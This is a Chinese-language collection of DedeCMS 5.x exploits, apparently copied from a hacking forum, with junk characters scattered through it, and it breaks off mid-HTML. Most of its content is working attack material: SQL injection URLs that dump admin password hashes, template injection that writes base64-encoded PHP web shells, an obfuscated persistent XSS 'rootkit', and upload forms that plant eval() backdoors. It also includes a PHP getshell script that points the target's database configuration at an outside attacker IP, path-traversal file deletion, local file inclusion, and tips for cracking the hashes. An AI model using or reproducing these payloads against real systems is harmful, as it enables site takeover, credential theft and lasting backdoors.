|
|
6 p f- G* f# v0 G' {Dedecms 5.6 rss注入漏洞1 \" _0 {; ?, r
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
: I7 t/ k4 o) Y l+ n9 J, |( G
( U, \, d/ o* o; C, O( { Z! Z; h9 B% u" u, k+ L2 a; P
2 v; K: B& C( w5 Q6 h+ Q; r8 b6 g
2 G8 g3 D! N, b1 H+ _2 P
4 H! E5 {0 Z( o3 W# @5 y* U/ x
' m* D, q, L; B8 d8 W0 L
1 I, ?/ V5 S) @8 S6 m6 v$ z' [# E9 z) t& {
DedeCms v5.6 嵌入恶意代码执行漏洞
+ `- B5 }- q. ~: I注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}7 e& S( } P+ d1 q
发表后查看或修改即可执行- Z! ?; v+ D* r* F0 _
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}' F' d( \7 V Z" l: F
生成x.php 密码xiao,直接生成一句话。
( `8 p( r1 v6 b$ A; ^
9 j7 I; s1 ~& ~; L- H6 X1 y" @ {0 J" ?( K+ l5 n
; F; \5 W: }& @
# a5 o- }$ g; r8 T
8 J) E. q: Z5 P3 _" v# P
D& o2 j: T) e; _) u
! u2 A" j4 v% b4 j" X! Q8 Z, u4 n" g C% c L/ F
Dede 5.6 GBK SQL注入漏洞
( }- e" k$ b3 c* n0 xhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';5 K; y! Z7 p K# Q
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe, B7 I8 p* u! J( m5 D
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
; |+ p1 @) C* h( I3 ^6 D0 N8 X% w6 i% q7 Y% q3 _6 x
2 ?5 ~: Q5 w( _. n
4 k, N; b4 j6 i: Z
& _9 W- U( g4 B0 v1 Z& n: q
' P) y5 H" k* G9 t8 w7 S! E8 N: `5 }
$ |* T1 ~7 b0 U8 C' A6 x
" c* U I+ V. S# ~6 ~* N1 f7 H% ~! |1 a Q' x4 l6 x: J* y3 V
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 H3 A1 ]% [$ h5 ~3 F6 Y5 k$ r0 N! R: y4 d
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` , W) o1 q/ Q* a
% P1 Z a5 _- Q* \+ L: @4 @
; |7 ?3 M# V' s; P" \: T6 V/ ~: r7 }- u
+ I: J& X2 ~7 q$ ~/ Q( C: K& h* {
2 |, V% `( \6 C2 M
2 V7 f# s' q9 t( JDEDECMS 全版本 gotopage变量XSS漏洞/ k* H3 }0 u% O7 e- }
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 * K& X3 L) Z& K8 e& Y
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=". A; o" l, I8 \" _5 C
; O* A7 c+ a8 e2 Z7 Z& S4 U+ Y# \1 p% o" _0 p
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
' W; E& k( |' |) p6 ^http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda1 x: ]! s# E% [% b
. a4 c7 n$ }7 ~% z
' I7 e( H: N% S' uhttp://v57.demo.dedecms.com/dede/login.php
6 b' v, n6 x* d2 N
) ]) {; P3 k0 z' T3 k8 I. P4 J
1 }, q2 o/ ]$ V) Lcolor=Red]DeDeCMS(织梦)变量覆盖getshell
5 `& i3 B+ j7 E#!usr/bin/php -w6 r6 S, F) ?) G$ h, J; c
<?php3 h' u3 \& r Q; N8 A- V
error_reporting(E_ERROR);, ?% @8 E d, A4 G0 o9 T& Q
set_time_limit(0);. ?5 w! _+ o1 P
print_r('2 }$ x: w* [0 b3 }
DEDEcms Variable Coverage
k8 l. I6 K: ?" fExploit Author: www.heixiaozi.comwww.webvul.com9 D* q( [" B- b2 D* G% @* K# a
);
$ \+ R4 V, Z2 c3 h$ b$ Iecho "\r\n";' L0 X" O6 i% A! U" q
if($argv[2]==null){
7 f- U% C6 V8 K3 `% Tprint_r('" m% H f/ v7 p1 Z9 s) h5 d
+---------------------------------------------------------------------------+* f# S2 p: w" X# ^0 n2 Z% c
Usage: php '.$argv[0].' url aid path K1 h) z8 u! C; `# H- F
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
* Y& ~/ Q# t5 |0 dExample:/ y9 m4 W& |% Y; q
php '.$argv[0].' www.site.com 1 old
9 r% P3 N, R$ g. [+---------------------------------------------------------------------------+6 n) F/ H# _0 ~
');
" C4 N9 |( M6 |+ t. D" \exit;
( V* U- m% g. m8 I9 b: X: ]}% }9 q2 J! c4 \# J4 w. F7 c9 C7 V
$url=$argv[1]; z( o/ U% v- t5 K
$aid=$argv[2];! ]% k7 F3 }: `- h
$path=$argv[3];0 E3 J! l0 `: _- i7 [
$exp=Getshell($url,$aid,$path);; \; |( P" f3 X( d
if (strpos($exp,"OK")>12){
) I! {& w. c5 Uecho "; _# U4 S# M% ?
Exploit Success \n";
4 b5 V8 R- P5 T8 ^( I6 c; j3 Hif($aid==1)echo "
+ ^: h) P, e! Z2 NShell:".$url."/$path/data/cache/fuck.php\n" ;* e8 P( t1 a* s4 |+ ?
# L4 h2 g4 ^) h$ Y ~
% {' g( E2 z) ^! v1 L) Oif($aid==2)echo "/ P7 m) R) U4 t* D' ?
Shell:".$url."/$path/fuck.php\n" ;
0 N: {$ p. H' H& w0 d5 P
$ @3 U5 u' Y! {/ G$ U
7 N5 p' M- z+ m# B) k+ Y( |$ Yif($aid==3)echo "
; G0 V+ ]- }* Z* ~8 FShell:".$url."/$path/plus/fuck.php\n";
8 J& S2 }) ]* B ~) G) q/ U8 I* ^6 @- v, D
/ @: Y% X5 g% z1 ?& S2 ]}else{
1 \, Q' \4 N# m- g5 e: [echo "
2 ~( B% [5 A; I8 m, ~# MExploit Failed \n";( J2 R$ B9 t, K9 [2 t7 {# v$ f
}( P8 B; }0 T! [/ n% m2 B- q
function Getshell($url,$aid,$path){
+ {) u; h7 Y. `8 B' {) Q3 M1 Y$id=$aid;
7 T- q: k. o6 w$ X. t9 A0 g# q$host=$url;
w$ v+ R4 q) ~5 Z# U6 R. s# ]( P% A$port="80";* G4 x X# I8 @. N/ }
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
; U# X0 I) K: k6 ~2 v, v$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
+ w: l5 K+ l- a9 Y% D, e: C$data .= "Host: ".$host."\r\n";! H- @. ` p* D2 @
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
& G; _7 l/ G, O7 `# u$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
: Q* l4 m! i' C$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";- j" h0 d4 W7 Q5 V3 j+ D
//$data .= "Accept-Encoding: gzip,deflate\r\n";7 U* m* J) J; q. o# e
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";' S) ~$ r, G) k6 l$ J" [, l$ _1 \
$data .= "Connection: keep-alive\r\n";9 A8 Z9 Z- K) w( p8 @
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";7 f4 D$ K! k+ W% X7 j( x1 m
$data .= "Content-Length: ".strlen($content)."\r\n\r\n"; d( R" O4 {" Y* g
$data .= $content."\r\n";! x# F K. `- w8 |* ]8 g& n
$ock=fsockopen($host,$port);
7 ^# {) N, n/ L1 |if (!$ock) {2 l0 T/ l1 ?* W# b6 m
echo "
( ^( F0 w% @$ U2 Q/ Q5 |% J; t& _No response from ".$host."\n";
* ?9 T+ G" l% \: w& k9 ]}
/ q7 E6 U. E, G5 hfwrite($ock,$data);
q9 w3 A4 ?0 xwhile (!feof($ock)) {) D0 R; C& J8 B2 p
$exp=fgets($ock, 1024);. h7 D* H7 U0 v( U/ E
return $exp;
0 `0 ?" }6 L: d# q8 \9 ~}6 e2 W5 [: J: m2 S o. Y
}: b2 v6 C+ o/ Q6 ?. X& I
0 m/ ?0 G) y/ G4 M* u; ]+ Y
R8 q2 V2 j8 k& P; |
?>
+ R- P5 h: r8 f
, C1 k; }; z% M+ S+ B
2 l/ S$ `$ j |8 J8 A- f% o) j! S" V
' G. G8 m. Z. C8 Y
& }2 O0 |* d5 ~, i5 @
& }2 w' b* S2 e) r+ T, H! w# x/ ?
2 E" H) X7 B( A, g7 B3 {. I0 @
9 E( @7 L) B/ _' s" I4 M7 A3 B4 x9 o
" T2 H$ u0 S3 H$ _4 s! o8 v: \DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)2 ~: \: }9 c' i9 _* s, S3 x
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root7 z6 l# i. C& g3 L. j9 O
. v8 v# N8 j5 {: s' ], u
& ]& q& b6 F* J+ D) ` V3 L" w" b) z把上面validate=dcug改为当前的验证码,即可直接进入网站后台) H/ [& V N0 y: a; I; l0 {* k8 n
7 Q$ S+ m2 Q" u; c, C3 b/ m+ a5 F) ?! ?9 j0 G, p: K: S
此漏洞的前提是必须得到后台路径才能实现
8 [. C# ]0 |) H
V8 ~( o2 v# u2 ?# n! [* [3 v: L. u" ^0 B# a6 Y% t
: o4 M: ^, U! m8 r) A; Y5 P1 ]3 ?# a, p& k( {' y1 j; I/ O* T
# W) _9 l4 R! z+ L, t
: |1 h4 S( j9 p: I0 t& N5 T# i! y# a
5 a* `$ a* V7 _$ \! _( Z# N9 ?& }, f5 F& {. ~ _
5 ^& M7 @8 L0 Y, B' \
7 V$ x: F2 |# E4 K5 X; B+ S4 \
Dedecms织梦 标签远程文件写入漏洞1 q9 e1 Q1 ]7 _( O. d/ h
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');. t! i# [0 {& W1 M6 g) J8 x. B
7 j! x L# F K+ K+ B1 B {2 \
" z" r3 G" D, ~& L再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 6 e8 g$ u7 b) V- l4 B0 R+ J
<form action="" method="post" name="QuickSearch" id="QuickSearch">. j8 I$ \, U1 S j* s/ N
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 i- C z% p. i3 A q<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />, g$ w L# M. G# D8 ~3 o
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
) g4 W0 _; R3 Z* q2 a: i3 m<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
8 j& m+ `7 }! j6 P, o- i7 i, u, P<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />. G; b s+ h' z" k1 \
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 Q. \% K u7 B% Z. r$ R<input type="text" value="true" name="nocache" style="width:400"># \2 `9 Z, k7 c, x" @
<input type="submit" value="提交" name="QuickSearchBtn"><br />3 {4 \4 |; x( W
</form>
2 M6 S7 W# |2 t h<script>8 ^- l- r; Q Z. q+ b
function addaction()
" g# j2 @8 {; f4 e; b1 H" N# o{
* N2 p: p* G8 r, N' `( V: p& idocument.QuickSearch.action=document.QuickSearch.doaction.value;, [; y$ q9 s2 [
}4 S9 q* ]1 G/ X! A" }) a" k
</script>, ]- s8 Z) f, f
& I9 j8 W* h- N8 K0 \ K
. R7 g8 V4 @/ c- F/ ]' k0 p- Z1 T' f
+ n5 ?$ _# W' G# ~8 i
+ d4 q ]: E' T/ h: d6 `" e% m2 Y6 }& Q, F
; k; ]4 G) J/ ?& K" E
) s% M" u" H$ ]& M" m" ^( x
: k1 Q- \' i5 P8 |( v
/ e. k! L) \3 N* @
/ q% `3 r* L2 ?5 |; f- h, K) NDedeCms v5.6 嵌入恶意代码执行漏洞
2 ^' T; D; a" F" R注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
/ [% _: Q' z$ u: z1 O+ M P) na{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}# N* x. ]. n+ `/ ]
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
3 n" ^/ U# L8 R- R' F+ v: kDedecms <= V5.6 Final模板执行漏洞
/ S- y' l0 [+ d3 t7 Y( E注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
- p9 |- _# m- j; C2 huploads/userup/2/12OMX04-15A.jpg; H- _, v! Y- y0 g( c, G4 N& A9 T7 G9 `; j; h
0 s' M Z) ?+ B4 Z
# Q- S6 P- o; B0 w
模板内容是(如果限制图片格式,加gif89a):
& }" u5 a* }, W; ?& l* o8 u{dede:name runphp='yes'}
8 r- x3 w6 ^1 r$ e" F( {$ }, v$fp = @fopen("1.php", 'a');
/ }8 o$ J; \# M@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
# S) Y# V/ ^" L& o@fclose($fp);/ L- p( t. E7 G: [6 H s/ q
{/dede:name}
, j# B% }) E% D2 修改刚刚发表的文章,查看源文件,构造一个表单:
* w% L7 d! q3 O<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
; E7 X( b% m/ q8 }3 _% P<input type="hidden" name="dopost" value="save" />' W; n: ~5 N) H: o
<input type="hidden" name="aid" value="2" />1 u* @. v2 q. J# H9 Q1 @* h5 [
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
9 M7 w% ]6 H9 z<input type="hidden" name="channelid" value="1" />
6 Z7 r0 A( f7 _! v& T<input type="hidden" name="oldlitpic" value="" />
, c& S: @( r2 B- U6 E<input type="hidden" name="sortrank" value="1275972263" />
" K& i0 f. a' M/ X3 l1 ?% ^( ^: y R! ~$ [1 z
. h E) Z! l# c- H7 n8 o
<div id="mainCp">5 m) v$ i" r' |/ y/ i
<h3 class="meTitle"><strong>修改文章</strong></h3>
; `4 ~" l# \+ Y
* s2 _+ R" l% R) d% m' D& a( c% R. U8 n5 t
<div class="postForm">
9 w6 N$ D3 q/ _, Y1 w3 P& `<label>标题:</label>6 A0 k) f' l3 Y$ g* _# `
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>2 i8 u& t9 i$ f! f4 J0 N
6 }: n$ T: [) M6 x: h
' a+ N) Y! F f4 }! X" p! w<label>标签TAG:</label>/ X6 c7 h0 p/ D, I) b- C1 S
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
. Y" _' w, L/ y) b6 C i; @) [5 v: ?6 V& d. h9 u: b
, {% K; P1 Q7 `7 W7 B. j<label>作者:</label> f! A; L( @ t5 H# z( }. \3 r
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
8 q) I* s" u( b, x" x8 w e- E1 j6 k2 B% \+ U7 k
$ L, y* q7 f( L5 x2 K* w
<label>隶属栏目:</label>+ B% n F6 o, R& u
<select name='typeid' size='1'>6 F, L U* U0 U9 B
<option value='1' class='option3' selected=''>测试栏目</option>
5 s/ u; d7 G" M1 N: }& L6 m4 l0 Y</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
0 ]# U/ @5 W* d' L( c K# M% K, h7 E7 D' y. _+ J
# L0 u: d6 u- f7 S
<label>我的分类:</label># d" r" a* V: o, E0 j0 n1 S/ g
<select name='mtypesid' size='1'>
) |" j4 N% ~4 K5 O8 [' W<option value='0' selected>请选择分类...</option>0 \' J- t. }: |. m
<option value='1' class='option3' selected>hahahha</option>
( h" w* x+ K4 _& k, G# x</select>- u e# E. |- [1 J2 W6 W' A% g
z0 ?5 a0 Y2 K# z) g( V1 ?/ \7 {! W& u4 P3 b; O
<label>信息摘要:</label>! {) a* n# W" i% Z9 X* N$ [
<textarea name="description" id="description">1111111</textarea>$ Z& c1 J5 s* e3 B4 I) k
(内容的简要说明); E8 Y' o, c( ^/ i) Q9 T
! N3 C. n- R) c F) V% b7 p3 Q( ?$ N) i. y
<label>缩略图:</label>
- |) _, {4 M$ E* A<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
: V1 u% q+ {; f6 a5 ` x8 f }- Q' r. B7 y8 i$ m
! y( R* j& V( E7 ~<input type='text' name='templet'+ m( |( p( u5 C# Y, X) U1 S
value="../ uploads/userup/2/12OMX04-15A.jpg">
& Z* [* R# M( Q: z) o0 @6 I+ F<input type='text' name='dede_addonfields'6 j6 v2 r6 [7 O5 n& w+ q4 o
value="templet,htmltext;">(这里构造)1 Q0 u: e z) `: B
</div>; m, S, f' b* A7 Z' s, c
5 C) m6 _2 P, {( W1 F
( b: I2 E0 M' l6 m<!-- 表单操作区域 -->
7 F6 {+ n. S3 _# w8 G<h3 class="meTitle">详细内容</h3>
* H7 a$ ]& ]8 o4 \) y8 _, p% ~
7 z! S- X3 G. e# n& F
; u2 P9 [9 n* U1 }- `<div class="contentShow postForm">2 `0 k, \, p* l1 R6 v
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
2 ?% |! H5 W( R2 q6 k8 F' w# C0 _
" Q6 T' X5 g/ ~<label>验证码:</label>& L( A9 |& t7 a3 w- h
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' /> ?' b" M4 X' H% o" I
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />; J; B' t( e7 \ F. R! g* ^
% |5 _- r" U$ F- s$ U
+ K! i. \ \( U3 G7 K
<button class="button2" type="submit">提交</button>( I% C ^- T! V+ n& s; d* H/ ~
<button class="button2 ml10" type="reset">重置</button>
3 @' a. T3 F: R/ ?</div>
/ H; N% {' F9 o n! t5 O' W0 O" @$ J: T3 n1 K$ O
/ |8 n. E' T% P: Z7 u</div>7 l# ^/ A% x' v/ X7 d O
, V& o4 A/ `7 ^
. M7 g( J9 i/ \5 ]; y3 p
</form>
3 N; E/ r& H/ N* E# }1 R# Q) r
; F6 c# D- f9 t$ l% k# j. m, ^: {! K6 D% g5 ]) W& S. c% Y
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
' f( D; @9 L v- v假设刚刚修改的文章的aid为2,则我们只需要访问:
/ D% h4 ]8 ]% V2 k$ ?( ahttp://127.0.0.1/dede/plus/view.php?aid=21 m6 r% W% H# Z: @8 Z+ g0 ]
即可以在plus目录下生成webshell:1.php
9 m( n" B* G: U6 b. H! l
: h) }! V4 H+ E% w7 _8 U7 z3 C# m6 P! D, p% N( D0 `! U w; [2 W4 q" Y
! @' Q; [+ M# B8 W) D- S: [. j- a2 `( c) K# ]$ x( V
: `' W6 S, ^( G3 |: a; B1 X& C" e
/ y1 ?2 D% [7 C* C) G% E2 b
0 Q i/ \: ^' ]# }2 \3 S
9 k9 ]3 }% h( B) r8 U2 Z. n7 D1 h+ T7 o! |4 Z6 L6 v/ `" P
3 H; {# e; g# I6 X1 ?
1 m- e4 z" K9 ~$ eDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
" @; L& z. a( y& [8 {# W' _- ]Gif89a{dede:field name='toby57' runphp='yes'}/ W0 _; k. O0 J1 Y8 o9 O. M; P; ?
phpinfo();
% r- ^- {( U* ^4 k$ ~{/dede:field}! K1 I# H- C5 w
保存为1.gif% X* Y: k1 @ |0 T
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 W. V/ T1 i" L( p4 ]<input type="hidden" name="aid" value="7" /> 7 y1 Y6 r G5 e& w
<input type="hidden" name="mediatype" value="1" /> & l0 H# [9 a$ x, J6 B- q( Q: W
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> , i. W, u& I/ w( I9 [' s
<input type="hidden" name="dopost" value="save" />
" R8 Z( r* I0 X6 E<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
; J2 ?, }/ ^& J5 P' \& R, c<input name="addonfile" type="file" id="addonfile"/>
7 D- G: r B& o! t0 F+ a<button class="button2" type="submit" >更改</button>
) U; T+ o+ _& p2 z; X; u, B4 V p</form> 0 Y# a7 p, U/ w7 G1 L i$ C
3 Z. `6 P/ }: E5 q) Q3 W
7 B1 c/ m1 B0 z* T, V- ?5 P构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
7 d/ d) X( s9 U! f3 d发表文章,然后构造修改表单如下:
! g+ Q; `! m' R3 K; a
# p& e+ ]5 N$ [' e. b* k4 S+ j& _5 W% ~+ e2 m3 S) X0 Q5 E+ X
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
, K, B3 O0 g' ]& F" Z$ q- f7 I5 }<input type="hidden" name="dopost" value="save" /> ( P5 y* N8 N" c6 m F" }7 h
<input type="hidden" name="aid" value="2" />
, C. P: b3 K% Q4 \ e2 F) z/ L<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
/ D$ k; F& [% i) [( h5 a& A<input type="hidden" name="channelid" value="1" /> 8 y1 M" q/ k/ u$ u8 [& I
<input type="hidden" name="oldlitpic" value="" />
: o% F) Y ~) w/ }<input type="hidden" name="sortrank" value="1282049150" /> . ]! m5 E/ [, W; N
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
3 {) M/ E! P* B% R2 o5 L<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
6 u* m9 }+ w! U8 F' C/ f8 s<select name='typeid' size='1'>
( a3 ~8 r( G; E% @/ H<option value='1' class='option3' selected=''>Test</option>
% ]! [- C$ `& j) M; h8 f E<select name='mtypesid' size='1'> ! N3 x8 B5 `! D0 A+ R1 ~
<option value='0' selected>请选择分类...</option> * E- S3 s3 M* [2 x; v
<option value='1' class='option3' selected>aa</option></select> 8 _% M, d* U, Z
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
6 b7 T7 Q; |) U: ^! u: r M' T<input type='hidden' name='dede_addonfields' value="templet">
% S4 x C, J% `6 Q" v: k1 R<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
1 n5 `4 U5 r1 ~ k' a- b<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> * N4 e9 X( C3 }
<button class="button2" type="submit">提交</button> ; _$ r2 u# ~" c! Q3 S0 o
</form>0 W7 z- z( e' N; P" P+ h
. C6 k; u7 J" e6 T5 L) @ ]
% J: e2 `7 c2 C/ s2 A7 R
6 Q8 P* w/ g0 ]& h) D! s
. t' {) S" }5 {. a' g, S" y
7 D! c2 e- G4 ]: {7 h: M- X/ o) w% h1 f! e: l* a) q- u9 L& r' o: ?
/ j( \. ^9 `. L: `+ |0 ~; q6 y
/ E8 @7 n4 f; u2 s7 U. q
# z2 F% J6 i/ b/ K/ X5 @$ E1 w/ s+ W0 w1 Z( U2 h
C# e" ?5 e1 B- x) e4 ^
: X, J# E* l0 U6 o3 W4 \7 n2 I# v
织梦(Dedecms)V5.6 远程文件删除漏洞
' E% c4 J0 d/ s( Ghttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
# I# `( r' A6 S
" Z' l# u# h2 R" b) Z) |
1 {3 d" w0 w0 |/ Q
: {) K- R% n+ f* U! p) V4 Z/ l- ^7 t. N2 q5 D4 {5 `
k3 ~% B3 I6 w, L0 ~
* T) ?0 B! e( C" U& R3 ]2 O8 H
" q( \/ E2 S P* `& Q2 w
( A4 H5 [' q' v8 a7 l% c
) A, V7 T7 o/ Z% z1 \% g2 ^# a% ~. n1 g) I" i& p& _
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
2 Z+ G+ ?; _8 |1 k8 ~3 Lhttp://www.test.com/plus/carbuya ... urn&code=../../0 J, u/ w. z8 o; X& o* d' _: i
) f2 k8 x! |/ Y) ^' T, [; B" Y# Z/ y: Q! b8 s
' P) A) Y, C- Z* [7 K8 G) K3 \; A
/ @6 g+ a2 A% J; y, b* I. O
( @! |3 i5 z! C4 {# d: }5 T) s( g/ Q$ Q
( f5 O0 {% ?1 Y7 h. G8 k
* H4 P& U# h) Y' ^
$ p: Y( t. l, j: S! v5 \
1 H0 x( |$ z. B1 g
" ^, I0 R) G; t8 p1 aDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 " q* F1 V. I/ f1 Z5 F
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
& J) B4 }4 p' F+ l. n9 M9 h密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5 L% Q) C, ]! {; {7 Y
6 T* n# w8 Z% O& e
" u W% s/ q- z$ m
8 x6 b. w$ t# ?# g$ v# b* c- T3 R/ T1 ~3 N# P! {. z( S0 @
! }4 l5 C0 j5 [4 O0 _
9 w) }" A/ {/ E! V' V+ z
- s, l$ t8 ?- x$ v
4 i* @$ F! |: p4 x7 i! }; M" b6 u. x' K1 y
" w6 y6 e. i3 k$ F
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
?& K" e* x5 X0 Mhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
( z G* J- S! J/ X* K! D9 z' A' t# I1 f# s
' o# E3 J* ?0 v$ P, F
, C6 T) e- e3 d& x6 I
4 N! P. X' {6 } a- E5 e* ^! H2 C1 n9 Z0 h7 g
: y# Q: u5 J5 g7 G1 c% {# {' r' g! o/ x7 G& r, \, w
8 [4 a" ]" u2 A# A
4 X1 I2 `$ P) c$ O- [$ [* [" x( S/ t4 ]) k. {
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞& x5 n) N t) r& D4 \& W
<html>! i$ m+ U' L1 }6 k+ m) `
<head>8 W( Z, ^# h9 E
